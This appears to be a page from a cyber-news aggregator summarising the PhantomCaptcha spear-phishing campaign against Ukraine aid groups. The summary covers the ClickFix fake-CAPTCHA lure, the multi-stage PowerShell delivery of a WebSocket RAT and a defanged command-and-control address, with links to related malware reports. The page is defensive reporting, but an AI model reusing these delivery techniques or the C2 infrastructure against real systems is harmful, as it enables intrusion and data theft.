Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Watchlists Beta Browse News Feed Stats About Contact

PhantomCaptcha WebSocket RAT PowerShell delivery chain

Malware Activity
First reported
Last updated
Happening score
H score 16
1 unique sources, 1 articles

Summary

Hide ▲

PhantomCaptcha delivered a WebSocket RAT on October 8 through a multi-stage PowerShell chain that let operators run commands, exfiltrate data, and load more malware. The payload relied on a ClickFix-style fake CAPTCHA and weaponized PDFs to push victims into executing the code themselves, reducing file-based detection. The second stage gathered host details such as computer name and domain information, then sent them to attacker infrastructure. The final backdoor maintained repeated connections to wss://bsnowcommunications[.]com:80, preserving remote access after delivery.

Related Happenings

AsyncRAT multi-stage delivery via trusted tools

Malware Activity
H score22 First: 11.06.2026 17:00 Last: 11.06.2026 17:00 Sources 1

About this happening: A **Windows** malware chain is now delivering **AsyncRAT**, increasing the risk of **stealthy remote access** on targeted systems. The lure uses **AI study guides** and **develope...

Open Happening

Vidar infostealer delivered through TikTok and Instagram Reels

Malware Activity
H score27 First: 10.06.2026 19:00 Last: 10.06.2026 19:00 Sources 1

About this happening: Threat actors are using **TikTok** and **Instagram Reels** to deliver **Vidar infostealer** through fake free-software tutorials, putting viewers at risk of **credential**, **fina...

Open Happening

Major web servers HTTP/2 Bomb remote DoS denial-of-service flaw

Vulnerability
H score39 First: 03.06.2026 11:33 Last: 03.06.2026 11:33 Sources 1

About this happening: Researchers disclosed **HTTP/2 Bomb**, a **remote denial-of-service** vulnerability in **default HTTP/2 configurations** that can make **NGINX, Apache HTTPD, Microsoft IIS, Envoy,...

Open Happening

Dohdoor backdoor activity on Windows endpoints

Malware Activity
H score28 First: 26.02.2026 17:17 Last: 26.02.2026 17:17 Sources 1

About this happening: A new **Dohdoor** backdoor is being used to provide **DNS-over-HTTPS (DoH)** C2 and **reflective payload execution** on **Windows** endpoints, increasing stealth and post-compromi...

Open Happening

MIMICRAT (aka AstarionRAT) ClickFix-delivered RAT activity

Malware Activity
H score16 First: 20.02.2026 13:55 Last: 20.02.2026 13:55 Sources 1

About this happening: The **MIMICRAT (aka AstarionRAT)** malware has been disclosed as a **ClickFix-delivered RAT** that enables **Windows token impersonation** and **SOCKS5 tunneling**, increasing the...

Open Happening

Timeline

  1. 24.10.2025 15:15 2 articles · 7mo ago

    PhantomCaptcha spear phishing delivers a WebSocket RAT through a fake Cloudflare CAPTCHA

    Exploitation Observed

    On October 8, 2025, a single-day spear phishing campaign targeted Ukraine aid groups and Ukrainian regional government administrations with weaponized PDFs that impersonated the Ukrainian President’s Office, redirected victims through a fake Cloudflare CAPTCHA page, and used user-triggered PowerShell execution to deliver a multi-stage payload culminating in a WebSocket remote access Trojan.

    Show sources
    Open in new tab
  2. 24.10.2025 15:15 1 articles · 7mo ago

    SentinelOne report identifies Ukraine aid groups and regional administrations as PhantomCaptcha targets

    Initial Disclosure

    On October 22, 2025, SentinelOne identified individual members of the International Red Cross, Norwegian Refugee Council, UNICEF, the Council of Europe’s Register of Damage for Ukraine, and Ukrainian government administrations in the Donetsk, Dnipropetrovsk, Poltava and Mikolaevsk regions as targets of PhantomCaptcha.

    Show sources
    Open in new tab